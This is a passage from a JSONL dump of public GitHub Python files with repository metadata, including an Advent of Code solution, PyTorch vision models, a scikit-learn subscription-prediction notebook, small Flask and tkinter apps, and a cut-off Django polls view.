analytics.flush\n","repo_name":"segmentio/analytics-python-cli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"20172420274","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\n\nclass Node:\n def __init__(self, data, next, prev_numeric):\n self.data = data\n self.next = next\n self.prev_numeric = prev_numeric\n\nclass CLLIterator:\n def __init__(self, cll):\n self.cll = cll\n self.node = cll.head\n self.start = cll.head\n self.first_iter = True\n\n def __next__(self):\n if not self.first_iter and self.node == self.start:\n raise StopIteration()\n self.first_iter = False\n result = self.node.data\n self.node = self.node.next\n return result\n\nclass CircularLinkedList:\n def __init__(self, list):\n self.head = None\n self.tail = None\n self.len = len(list)\n nodes = [None] * len(list)\n prev_node = None\n for i, e in enumerate(list):\n nodes[e - 1] = Node(e, self.head, None)\n if i == 0:\n self.head = nodes[e - 1]\n self.tail = nodes[e - 1]\n if prev_node:\n prev_node.next = nodes[e - 1]\n prev_node = nodes[e - 1]\n nodes[0].prev_numeric = nodes[-1]\n self.head_numeric = nodes[0]\n self.tail_numeric = nodes[-1]\n for i in range(1, len(nodes)):\n nodes[i].prev_numeric = nodes[i - 1]\n\n def __len__(self):\n return self.len\n\n def append(self, val):\n if not self.tail:\n raise RuntimeError('Invalid append')\n else:\n # note: the following assumes that the new value is also the new maximum one\n node = Node(val, self.head, None)\n self.tail.next = node\n if self.tail.data == val - 1:\n node.prev_numeric = self.tail\n else:\n prev_num = self.head\n while prev_num.data != val - 1:\n prev_num = prev_num.next\n if prev_num == self.head:\n raise RuntimeError(f'Could not find prev_numeric for {val}')\n node.prev_numeric = prev_num\n self.tail = node\n self.head_numeric.prev_numeric = node\n self.tail_numeric = node\n self.len += 1\n\n def __iter__(self):\n return CLLIterator(self)\n\n\n\ndef move(cups, current, max_label):\n sel = current.next\n current.next = sel.next.next.next\n destination = current.prev_numeric\n while True:\n if destination not in [sel, sel.next, sel.next.next]:\n prev_next = destination.next\n destination.next = sel\n sel.next.next.next = prev_next\n break\n destination = destination.prev_numeric\n return current.next\n\ndef part1(cups):\n max_label = max(cups)\n cups = CircularLinkedList(cups)\n current = cups.head\n for i in range(100):\n current = move(cups, current, max_label)\n cups = list(cups)\n i = cups.index(1)\n pre1 = cups[0:i]\n cups = cups[i+1:]\n cups.extend(pre1)\n return ''.join(map(lambda c: str(c), cups))\n\ndef part2(cups):\n max_label = max(cups)\n cups = CircularLinkedList(cups)\n while len(cups) != 1000000:\n cups.append(max_label + 1)\n max_label += 1\n\n begin = time.perf_counter()\n current = cups.head\n for i in range(10000000):\n current = move(cups, current, max_label)\n end = time.perf_counter()\n print(f'Elapsed time (part 2): {end - begin:0.4f} seconds')\n cups = list(cups)\n i = cups.index(1)\n cw1 = cups[(i + 1) % len(cups)]\n cw2 = cups[(i + 2) % len(cups)]\n return cw1 * cw2\n\ndef main(arguments):\n f = open('inputs/day23', 'r')\n cups = [int(cup) for cup in f.read().strip('\\n')]\n print(f'Part 1: {part1(cups.copy())}')\n print(f'Part 2: {part2(cups.copy())}')\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))","repo_name":"RoBaaaT/advent-of-code-2020","sub_path":"day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"13531485444","text":"#! -*- coding:utf-8 -*-\r\n\r\n'''\r\n@Author: ZM\r\n@Date and Time: 2021/6/27 5:52\r\n@File: darknet.py\r\n'''\r\n\r\nfrom torch import nn\r\n\r\nclass ConvBNAct(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1):\r\n super(ConvBNAct, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=kernel_size // 2, bias=False)\r\n self.bn = nn.BatchNorm2d(out_channels)\r\n self.act = nn.LeakyReLU(negative_slope=0.2)\r\n\r\n def forward(self, x):\r\n return self.act(self.bn(self.conv(x)))\r\n\r\nclass ResBlock(nn.Module):\r\n def __init__(self, in_channels, channels, num_blocks):\r\n super(ResBlock, self).__init__()\r\n self.num_blocks = num_blocks\r\n self.downsampling = ConvBNAct(in_channels, channels, 3, stride=2)\r\n for i in range(num_blocks):\r\n setattr(self, f'stage{i}',\r\n nn.Sequential(ConvBNAct(channels, channels // 2, 1), ConvBNAct(channels // 2, channels, 3)))\r\n\r\n def forward(self, x):\r\n x = self.downsampling(x)\r\n identity = x\r\n for i in range(self.num_blocks):\r\n x = getattr(self, f'stage{i}')(x)\r\n x += identity\r\n identity = x\r\n\r\n return x\r\n\r\nclass DarkNetBody(nn.Module):\r\n def __init__(self):\r\n super(DarkNetBody, self).__init__()\r\n self.conv_bn_act = ConvBNAct(3, 32, 3)\r\n self.res_block1 = ResBlock(32, 64, 1)\r\n self.res_block2 = ResBlock(64, 128, 2)\r\n self.res_block3 = ResBlock(128, 256, 8)\r\n self.res_block4 = ResBlock(256, 512, 8)\r\n self.res_block5 = ResBlock(512, 1024, 4)\r\n\r\n def forward(self, x):\r\n x = self.conv_bn_act(x)\r\n x = self.res_block2(self.res_block1(x))\r\n fp3 = x = self.res_block3(x)\r\n fp2 = x = self.res_block4(x)\r\n fp1 = x = self.res_block5(x)\r\n\r\n return fp1, fp2, fp3","repo_name":"mengzhu0308/object-detection","sub_path":"yolov3_pt/backbone/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"40522472025","text":"import torch\nimport torch.nn as nn\nimport torch.optim as ooptim\nimport torch.utils as utils\nimport torch.utils.data as data\nimport torchvision.utils as v_utils\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport torchvision.models as models\n\nfrom PIL import Image\n# %matplotlib inline # drawing at browser 'inline'\n\ncontent_layer_num = 1\nimage_size = 512\nepoch = 5000\n\ndef image_preprocess(img_dir):\n img = Image.open(img_dir)\n transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.40760392, 0.45795686, 0.48501961],\n std=[1,1,1]),\n ])\n img = transform(img).view((-1,3,image_size,image_size))\n return img\n\ndef image_postprocess(tensor):\n transform = transforms.Normalize(mean=[-0.40760392, -0.45795686, -0.48501961],\n std=[1,1,1])\n img = transform(tensor.clone())\n img = img.clamp(0,1)\n img = torch.transpose(img,0,1)\n img = torch.transpose(img,1,2)\n return img\n\n# using pre-trained resnet50\nresnet = models.resnet50(pretrained=True)\n'''\nfor name,module in resnet.named_children():\n print(name)\n'''\n\n\nclass Resnet(nn.Module):\n def __init__(self):\n super(Resnet, self).__init__()\n self.layer0 = nn.Sequential(*list(resnet.children())[0:1])\n self.layer1 = nn.Sequential(*list(resnet.children())[1:4])\n self.layer2 = nn.Sequential(*list(resnet.children())[4:5])\n self.layer3 = nn.Sequential(*list(resnet.children())[5:6])\n self.layer4 = nn.Sequential(*list(resnet.children())[6:7])\n self.layer5 = nn.Sequential(*list(resnet.children())[7:8])\n\n def forward(self, x):\n out_0 = self.layer0(x)\n out_1 = self.layer0(out_0)\n out_2 = self.layer0(out_1)\n out_3 = self.layer0(out_2)\n out_4 = self.layer0(out_3)\n out_5 = self.layer0(out_4)\n return out_0, out_1, out_2, out_3, out_4, out_5\n\nclass GramMatrix(nn.Module):\n def forward(self, input):\n b, c, h, w = input.size()\n F = input.view(b, c, h*w)\n G = torch.bmm(F, F.transpose(1, 2))\n return G\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# print(device)\n\nresnet = Resnet().to(device)\nfor param in resnet.parameters():\n param.requires_grad = False\n\nclass GramMSELoss(nn.Module):\n def forward(self, input, target):\n out = nn.MSELoss()(GramMatrix()(input), target)\n return out\n\ncontent = image_preprocess(content_dir).to(device) # Set content image\nstyle = image_preprocess(style_dir).to(device) # Set style image\ngenerated = content.clone().requires_grad_().to(device) # Set generating image\n# print(content.requires_grad,style.requires_grad,generated.requires_grad)\n\n'''\n\nplt.imshow(image_postprocess(content[0].cpu()))\nplt.show()\n\nplt.imshow(image_postprocess(style[0].cpu()))\nplt.show()\n\ngen_img = image_postprocess(generated[0].cpu()).data.numpy()\nplt.imshow(gen_img)\nplt.show()\n\n'''\n\nstyle_target = list(GramMatrix()(i) for i in resnet(style))\ncontent_target = resnet(content)[content_layer_num]\nstyle_weight = [1/n**2 for n in [64,64,256,512,1024,2048]]\n\noptimizer = optim.LBFGS([generated])\n\niteration = [0]\nwhile iteration[0] < epoch:\n def closure():\n optimizer.zero_grad()\n out = resnet(generated)\n style_loss = [GramMSELoss()(out[i], style_target[i]) * style_weight[i] for i in range(len(style_target))]\n content_loss = nn.MSELoss()(out[content_layer_num], content_target)\n total_loss = 1000 * sum(style_loss) + content_loss\n total_loss.backward()\n if iteration[0] % 100 == 0:\n print(total_loss)\n iteration[0] += 1\n return total_loss\n\n optimizer.step(closure)\n\ngen_img = image_postprocess(generated[0].cpu()).data.numpy()\n\nplt.figure(figsize=(10,10))\nplt.imshow(gen_img)\nplt.show()","repo_name":"tinyfrog/pytorch_practice","sub_path":"Transfer/style_transfer.py","file_name":"style_transfer.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"74486570561","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\n# Importing Libraries\nimport numpy as np # used for numeric calculations\nimport pandas as pd # used for data analysis and manipulation\nimport matplotlib.pyplot as plt # used for data visualization\nimport seaborn as sns \nfrom dateutil import parser # used for converting time into date time datatype\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\n\n\n# In[25]:\n\n\n# importing dataset\nFinance_Data = pd.read_csv(\"B:\\FineTech_appData.csv\")\n\n\n# In[26]:\n\n\nfeatures = Finance_Data.columns\nfor i in features:\n print(\"\"\"Unique value = {}\\n{}\\nTotal Length = {} \\n........................\\n\n \"\"\".format(i, Finance_Data[i].unique(), len(Finance_Data[i].unique())))\n\n\n# In[27]:\n\n\n#reading first 5 rows of dataset\nFinance_Data.head(5)\n\n\n# In[29]:\n\n\n# reading the data types of features\nFinance_Data.info()\n\n\n# In[36]:\n\n\n# analyzing the data for null values\nFinance_Data.isnull().sum()\n\n\n# In[38]:\n\n\nFinance_Data.dtypes\n\n\n# In[40]:\n\n\n# for data visualizing we need numeric data type.\n# creating another variable to store numeric values\nFinance_Data2 = Finance_Data.drop(['user', 'first_open', 'screen_list', 'enrolled_date'], axis = 1)\n\n\n# In[41]:\n\n\n# reading another numeric varibale\nFinance_Data2.head(5)\n\n\n# In[42]:\n\n\n# Data Visualization by HeatMap\nplt.figure(figsize=(16,9)) # heatmap size - ratio 16:9\n \nsns.heatmap(Finance_Data2.corr(), annot = True, cmap ='coolwarm') # show heatmap\n \nplt.title(\"Heatmap using correlation matrix of Finance_Data2\", fontsize = 25) # title of heatmap\n\n\n# In[43]:\n\n\n# Data Visualization by Pairplot\nsns.pairplot(Finance_Data2, hue = 'enrolled')\n\n\n# In[49]:\n\n\nprint(\"User Enrolled = \", 50000 - (Finance_Data2.enrolled < 1).sum())\nsns.countplot(Finance_Data2.enrolled)\nprint(\"User Not Enrolled = \",(Finance_Data2.enrolled < 1).sum())\n\n\n# In[52]:\n\n\n# Data Visualization via Histogram\nplt.figure(figsize=(16,9)) # figure size - ratio 16:9\nfeatures = Finance_Data2.columns\nfor i,j in enumerate(features):\n plt.subplot(3,3,i+1) # creating subplot for histogram\n plt.title(\"Histogram of {}\".format(j), fontsize = 15) # title of histogram\n \n bins = len(Finance_Data2[j].unique()) # bins of histogram\n plt.hist(Finance_Data2[j],bins = bins, rwidth = 0.8, edgecolor = \"y\", linewidth = 2, ) # plot histogram\n\nplt.subplots_adjust(hspace=0.5)\n\n\n# In[53]:\n\n\n# Data Visualization via Bar Plot\nsns.set # set background dark grid\nplt.figure(figsize = (14,5))\nplt.title(\"Correlating numeric features with 'enrolled' \", fontsize = 20)\nFinance_Data3 = Finance_Data2.drop(['enrolled'], axis = 1)\nax = sns.barplot(Finance_Data3.columns, Finance_Data3. corrwith(Finance_Data.enrolled))\nax.tick_params(labelsize = 15, labelrotation = 20, color = \"k\")\n\n\n# In[54]:\n\n\nFinance_Data['first_open'] =[parser.parse(i) for i in Finance_Data['first_open']]\n \nFinance_Data['enrolled_date'] =[parser.parse(i) if isinstance(i, str) else i for i in Finance_Data['enrolled_date']]\n \nFinance_Data.dtypes\n\n\n# In[55]:\n\n\nFinance_Data['time_to_enrolled'] = (Finance_Data.enrolled_date - Finance_Data.first_open).astype('timedelta64[h]')\nplt.hist(Finance_Data['time_to_enrolled'].dropna())\n\n\n# In[56]:\n\n\nplt.hist(Finance_Data['time_to_enrolled'].dropna(), range = (0,100)) \n\n\n# In[57]:\n\n\n# Feature Selection\nFinance_Data3 = pd.read_csv(\"top_screens.csv\").top_screens.values\n \nFinance_Data3\n\n\n# In[58]:\n\n\nFinance_Data['screen_list'] = Finance_Data.screen_list.astype(str) + ','\n\n\n# In[59]:\n\n\n# string into to number\n \nfor screen_name in Finance_Data3:\n Finance_Data[screen_name] = Finance_Data.screen_list.str.contains(screen_name).astype(int)\n Finance_Data['screen_list'] = Finance_Data.screen_list.str.replace(screen_name+\",\", \"\")\n\n\n# In[60]:\n\n\nFinance_Data.shape\n\n\n# In[61]:\n\n\n# remain screen in 'screen_list'\nFinance_Data.loc[0,'screen_list']\n\n\n# In[62]:\n\n\n# count remain screen list and store counted number in 'remain_screen_list'\n \nFinance_Data['remain_screen_list'] = Finance_Data.screen_list.str.count(\",\")\n\n\n# In[63]:\n\n\n# Drop the 'screen_list'\nFinance_Data.drop(columns = ['screen_list'], inplace=True)\n\n\n# In[64]:\n\n\nFinance_Data.columns\n\n\n# In[65]:\n\n\n# taking sum of all saving screen in one place\nsaving_screens = ['Saving1',\n 'Saving2',\n 'Saving2Amount',\n 'Saving4',\n 'Saving5',\n 'Saving6',\n 'Saving7',\n 'Saving8',\n 'Saving9',\n 'Saving10',\n ]\nFinance_Data['saving_screens_count'] = Finance_Data[saving_screens].sum(axis = 1)\nFinance_Data.drop(columns = saving_screens, inplace = True)\n\n\n# In[66]:\n\n\n# taking sum of all credit screen in one place\ncredit_screens = ['Credit1',\n 'Credit2',\n 'Credit3',\n 'Credit3Container',\n 'Credit3Dashboard',\n ]\nFinance_Data['credit_screens_count'] = Finance_Data[credit_screens].sum(axis = 1)\nFinance_Data.drop(columns = credit_screens, axis = 1, inplace = True)\n\n\n# In[67]:\n\n\n# taking sum of all cc screen in one place\ncc_screens = ['CC1',\n 'CC1Category',\n 'CC3',\n ]\nFinance_Data['cc_screens_count'] = Finance_Data[cc_screens].sum(axis = 1)\nFinance_Data.drop(columns = cc_screens, inplace = True)\n\n\n# In[68]:\n\n\n# taking sum of all Loan screen in one place\nloan_screens = ['Loan',\n 'Loan2',\n 'Loan3',\n 'Loan4',\n ]\nFinance_Data['loan_screens_count'] = Finance_Data[loan_screens].sum(axis = 1)\nFinance_Data.drop(columns = loan_screens, inplace = True)\n\n\n# In[69]:\n\n\nFinance_Data.shape\n\n\n# In[70]:\n\n\nFinance_Data.info()\n\n\n# In[71]:\n\n\n# Drop the 'screen_list'\nFinance_Data.drop(columns = ['first_open'], inplace=True)\n\n\n# In[73]:\n\n\nFinance_Data.drop(columns = ['enrolled_date'], inplace=True)\n\n\n# In[74]:\n\n\nFinance_Data.drop(columns = ['time_to_enrolled'], inplace=True)\n\n\n# In[75]:\n\n\nFinance_Data.info()\n\n\n# In[107]:\n\n\ntraget = Finance_Data['enrolled']\nFinance_Data.drop(columns = 'enrolled', inplace = True)\n\n\n# In[82]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(Finance_Data, traget, test_size = 0.2, random_state = 0)\n\nprint('Shape of X_train = ', X_train.shape)\nprint('Shape of X_test = ', X_test.shape)\nprint('Shape of y_train = ', y_train.shape)\nprint('Shape of y_test = ', y_test.shape)\n\n\n# In[85]:\n\n\n# take User ID in another variable \ntrain_userID = X_train['user']\nX_train.drop(columns= 'user', inplace =True)\ntest_userID = X_test['user']\nX_test.drop(columns= 'user', inplace =True)\n\n\n# In[86]:\n\n\nprint('Shape of X_train = ', X_train.shape)\nprint('Shape of X_test = ', X_test.shape)\nprint('Shape of train_userID = ', train_userID.shape)\nprint('Shape of test_userID = ', test_userID.shape)\n\n\n# In[87]:\n\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train_sc = sc.fit_transform(X_train)\nX_test_sc = sc.transform(X_test)\n\n\n# In[89]:\n\n\n# Decision Tree Classifier\nfrom sklearn.tree import DecisionTreeClassifier\ndt_model = DecisionTreeClassifier(criterion= 'entropy', random_state=0)\ndt_model.fit(X_train, y_train)\ny_pred_dt = dt_model.predict(X_test)\naccuracy_score(y_test, y_pred_dt)\n\n\n# In[90]:\n\n\n# K- Nearest Neighbor Classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nknn_model = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2,)\nknn_model.fit(X_train, y_train)\ny_pred_knn = knn_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_knn)\n\n\n# In[91]:\n\n\n# Naive Bayes Classifier\nfrom sklearn.naive_bayes import GaussianNB\nnb_model = GaussianNB()\nnb_model.fit(X_train, y_train)\ny_pred_nb = nb_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_nb)\n\n\n# In[92]:\n\n\n# Random Forest Classifier\nfrom sklearn.ensemble import RandomForestClassifier\nrf_model = RandomForestClassifier(n_estimators=10, criterion='entropy', random_state=0)\nrf_model.fit(X_train, y_train)\ny_pred_rf = rf_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_rf)\n\n\n# In[93]:\n\n\n# Logistic Regression Classifier\nfrom sklearn.linear_model import LogisticRegression\nlr_model = LogisticRegression(random_state = 0, penalty = 'l1')\nlr_model.fit(X_train, y_train)\ny_pred_lr = lr_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_lr)\n\n\n# In[94]:\n\n\n# Support Vector Machine\nfrom sklearn.svm import SVC\nsvc_model = SVC()\nsvc_model.fit(X_train, y_train)\ny_pred_svc = svc_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_svc)\n\n\n# In[95]:\n\n\n# XGBoost Classifier\nfrom xgboost import XGBClassifier\nxgb_model = XGBClassifier()\nxgb_model.fit(X_train, y_train)\ny_pred_xgb = xgb_model.predict(X_test)\naccuracy_score(y_test, y_pred_xgb)\n\n\n# In[99]:\n\n\n# Among all classifiers, XGBoost ML Model gave better results \n\n\n# In[101]:\n\n\n# confussion matrix\ncm_xgb = confusion_matrix(y_test, y_pred_xgb)\nsns.heatmap(cm_xgb, annot = True, fmt = 'g')\nplt.title(\"Confussion Matrix\", fontsize = 20) \n\n\n# In[102]:\n\n\n# Clasification Report\ncr_xgb = classification_report(y_test, y_pred_xgb)\n \nprint(\"Classification report >>> \\n\", cr_xgb)\n\n\n# In[104]:\n\n\n# Cross validation\nfrom sklearn.model_selection import cross_val_score\ncross_validation = cross_val_score(estimator = xgb_model, X = X_train_sc, y = y_train, cv = 10)\nprint(\"Cross validation of XGBoost model = \",cross_validation)\nprint(\"Cross validation of XGBoost model (in mean) = \",cross_validation.mean())\n\n\n# In[103]:\n\n\nfinal_result = pd.concat([test_userID, y_test], axis = 1)\nfinal_result['predicted result'] = y_pred_xgb\n \nprint(final_result)\n\n","repo_name":"BarreraNazir/Customer-Subscription-Behavior-Analysis","sub_path":"Customer_Subscription_Behavior_Analysis.py","file_name":"Customer_Subscription_Behavior_Analysis.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"23833663583","text":"from flask import Flask,render_template\nfrom flask_assets import Bundle, Environment\n\n\napp = Flask(__name__)\n\njs = Bundle('home.js', 'add.js', 'subtract.js', output='gen/main.js', filters='jsmin')\ncss = Bundle('main.css', 'style.css', output='gen/main-style.css', filters='cssmin')\nassets = Environment(app)\nassets.register('main_js', js)\nassets.register('main_css', css)\n\n@app.route('/')\ndef index():\n\ttitle = 'Assets'\n\n\treturn render_template('assets.html', title=title)\n\nif __name__=='__main__':\n\tapp.run(debug=True)","repo_name":"bionicdev/Flask-Jinja","sub_path":"assets_bundle_minifying.py","file_name":"assets_bundle_minifying.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"4599383482","text":"import tkinter as tk\nfrom tkinter import ttk\n\n# Initializing the main window\nroot = tk.Tk()\n\n# Defining the main frame which is aligned to left\nmain = ttk.Frame(root)\nmain.pack(side=\"left\", fill=\"both\", expand=True)\n\n# Putting 2 labels into the frame, the labels are aligned to top\ntk.Label(main, text=\"Label top\", bg=\"green\").pack(side=\"top\", fill=\"both\", expand=True)\ntk.Label(main, text=\"Label top\", bg=\"blue\").pack(side=\"top\", fill=\"both\", expand=True)\n\n# This label is in the main window, so touches the right side of the frame\ntk.Label(root, text=\"Label left\", bg=\"red\").pack(\n side=\"left\", fill=\"both\", expand=True\n)\n\n# Running the main window\nroot.mainloop()\n","repo_name":"pandrey2003/PyExercises","sub_path":"GUI/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"25399770780","text":"# quicksort complexity purely depends upon the pivot element that we choose\n# for average case the time complexity to sort is O(n*logn)\n# and for worst case the time complexity is O(n^2)\ndef quicksort(arr):\n if len(arr) < 2:\n return arr\n else:\n pivot=arr[0]\n less = [i for i in arr[1:] if i <= pivot]\n greater = [i for i in arr[1:] if i > pivot ]\n return quicksort(less) + [pivot] + quicksort(greater)\n\n# making testcases\n\ndef test(mine, expected):\n assert mine == expected, f'mine: {mine} vs expected: {expected}'\n\n\nx = test(quicksort([10, 5, 3, 2]), [2, 3, 5, 10])\nprint(x)","repo_name":"keshkaush/python_data_structure","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"30547863231","text":"from hashlib import sha1\nfrom pathlib import Path\nfrom typing import Iterable, NamedTuple, Union\n\nimport torch\nfrom ranking_utils.model.data import DataProcessor\nfrom torch_geometric.data import Batch as tgBatch\nfrom torch_geometric.data import Data\n\n# from torch_geometric.utils.convert import to_scipy_sparse_matrix\nfrom transformers import DistilBertTokenizer\n\nfrom .graph_construction import GraphConstruction\n\n\nclass Input(NamedTuple):\n doc: str\n query: str\n\n\nclass Batch(NamedTuple):\n docs: dict[str, torch.LongTensor]\n queries: dict[str, torch.LongTensor]\n doc_graphs: Data\n\n\nclass ProposedDataProcessor(DataProcessor):\n def __init__(\n self,\n graph_construction: GraphConstruction,\n query_limit: int = 10000,\n cache_dir: Union[str, Path, None] = \"./cache/graphs/\",\n append_mask: int = 0,\n device: Union[str, None] = None,\n ) -> None:\n super().__init__()\n assert isinstance(graph_construction, GraphConstruction), \"invalid type for graph_construction\"\n self.query_limit = query_limit\n self.cache_dir = Path(cache_dir) if cache_dir else None\n self.graph_construction = graph_construction\n self.tokenizer: DistilBertTokenizer = DistilBertTokenizer.from_pretrained(\"distilbert-base-uncased\")\n self.append_mask = append_mask\n self.device = device\n\n if self.cache_dir:\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n\n @torch.no_grad()\n def _construct_graph_or_load_from_cache(self, doc: str) -> Data:\n if self.cache_dir is None:\n return self.graph_construction(doc, device=self.device)\n # We can't use python's hash here since it is not consistent across runs\n # key = hash(doc).to_bytes(8, \"big\", signed=True).hex()\n key = sha1(doc.encode(), usedforsecurity=False).hexdigest()\n cache_file = self.cache_dir / f\"{key}\"\n if cache_file.exists():\n data = torch.load(cache_file)\n assert isinstance(data, Data)\n else:\n data = self.graph_construction(doc, device=self.device)\n torch.save(data, cache_file)\n\n return data\n\n def _construct_doc_batch(self, docs: list[str]) -> Data:\n batch = tgBatch.from_data_list([self._construct_graph_or_load_from_cache(doc) for doc in docs])\n assert isinstance(batch, Data)\n return batch\n\n def get_model_input(self, query: str, doc: str) -> Input:\n query = query.strip() or \"(empty)\"\n doc = doc.strip() or \"(empty)\"\n # Mimick some query expansion by adding masks to the query\n # (https://github.com/sebastian-hofstaetter/neural-ranking-kd/blob/main/minimal_colbert_usage_example.ipynb)\n return Input(doc=doc, query=query[: self.query_limit] + \" [MASK]\" * self.append_mask)\n\n def get_model_batch(self, inputs: Iterable[Input]) -> Batch:\n docs, queries = zip(*inputs)\n doc_in = self.tokenizer(docs, padding=True, truncation=True, return_tensors=\"pt\")\n query_in = self.tokenizer(queries, padding=True, truncation=True, return_tensors=\"pt\")\n\n return Batch(\n docs={\"input_ids\": doc_in[\"input_ids\"], \"attention_mask\": doc_in[\"attention_mask\"]},\n queries={\"input_ids\": query_in[\"input_ids\"], \"attention_mask\": query_in[\"attention_mask\"]},\n doc_graphs=self._construct_doc_batch([input.doc for input in inputs]),\n )\n","repo_name":"TheMrSheldon/GBaRD","sub_path":"experiments/proposition/_processor.py","file_name":"_processor.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"18844555580","text":"# codinf:utf-8\nfrom flask import Flask, render_template, Response, request\nimport serial\nport = \"/dev/ttyACM0\"\napp = Flask(__name__)\nsingle = serial.Serial(port, 9600)\nsingle.flushInput()\n\n\n@app.route('/')\ndef index():\n single.flushOutput()\n single.flushInput()\n single.write('8')\n response = str(single.readline().decode())\n if response.startswith('hum:'):\n # cut int num\n hum = response[5:7]\n tem = response[-6:-3]\n templateData = {\n 'tem': tem,\n 'hum': hum\n }\n print(response.strip('\\n'))\n return render_template('index.html', **templateData)\n\n\n@app.route('/fopen', methods=['POST', 'GET'])\ndef fopen():\n if request.method == 'GET':\n return render_template('index.html')\n else:\n single.flushOutput()\n single.write('1')\n return \"Open OK\"\n\n\n@app.route('/fclose', methods=['POST'])\ndef fclose():\n single.flushOutput()\n single.write('2')\n return \"Close OK\"\n\n\n@app.route('/lclose', methods=['POST'])\ndef lclose():\n # single.flushOutput()\n # single.write('3')\n return \"LED Close OK\"\n\n\n@app.route('/lopen', methods=['POST'])\ndef lopen():\n # single.flushOutput()\n # single.write('4')\n return \"LED Open OK\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True, threaded=True)\n","repo_name":"StarFishing/ardunio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"98"} +{"seq_id":"8179359250","text":"from flask import Flask, request, abort\nfrom flask_restful import Resource, Api\n\nimport click\n\nimport serial.tools.list_ports\n# import json\n\napp = Flask(__name__)\napi = Api(app)\n\ntodos = {}\n\n\n@click.command()\n@click.option('-p', default=5000, help='Port Number')\ndef startup(p):\n \"\"\"\n\n :param p:\n :return:\n \"\"\"\n app.run(host='0.0.0.0', port=p, debug=True)\n\n\nclass SimpleRest(Resource):\n def get(self, todo_id):\n return {todo_id: todos[todo_id]}\n\n def put(self, todo_id):\n todos[todo_id] = request.form['data']\n return {todo_id: todos[todo_id]}\n\n\nclass serialDevices(Resource):\n \"\"\"\n Class that returns the ports connected to the device.\n\n \"\"\"\n def get(self, nome=None):\n # When the name is not passed in the url, it returns all the available\n # ports.\n if not nome:\n # Returns list in format: ('device', 'name', description).\n devices = serial.tools.list_ports.comports()\n else:\n try:\n devices = next(serial.tools.list_ports.grep(nome))\n except:\n # When you can not find devices\n abort(404)\n if len(devices) == 0:\n # When you can not find devices\n abort(404)\n else:\n res = {'devices': devices}\n # Use return json.dumps(res) to return in string\n return res\n\n\napi.add_resource(SimpleRest, '/')\napi.add_resource(\n serialDevices,\n '/serialDevices',\n '/serialDevices/'\n)\n\nif __name__ == '__main__':\n startup()\n","repo_name":"somosprte/Hermes","sub_path":"hermes/hermes.py","file_name":"hermes.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"28680602423","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.utils import timezone\n\nfrom .models import Choice, Question\n\n\ndef home(request):\n if request.session.get('login_check'):\n return redirect('/posts')\n else:\n return render(request, 'polls/home.html')\n\n\nclass IndexView(generic.ListView):\n template_name = 'polls/posts.html'\n context_object_name = 'latest_question_list'\n\n def get_queryset(self):\n \"\"\"\n Return the last five published questions (not including those set to be\n published in the future).\n Question.objects.filter(pub_date__lte=timezone.now())\n returns a queryset containing Questions whose pub_date is less than or equal to - that is, earlier than or equal to - timezone.now.\n \"\"\"\n return Question.objects.filter(\n pub_date__lte=timezone.now()\n ).order_by('-pub_date') # [:5]\n\n\nclass DetailView(generic.DetailView):\n model = Question\n template_name = 'polls/post_details.html'\n\n def get_queryset(self):\n \"\"\"\n Excludes any questions that aren't published yet.\n \"\"\"\n return Question.objects.filter(pub_date__lte=timezone.now())\n\n\nclass ResultsView(generic.DetailView):\n 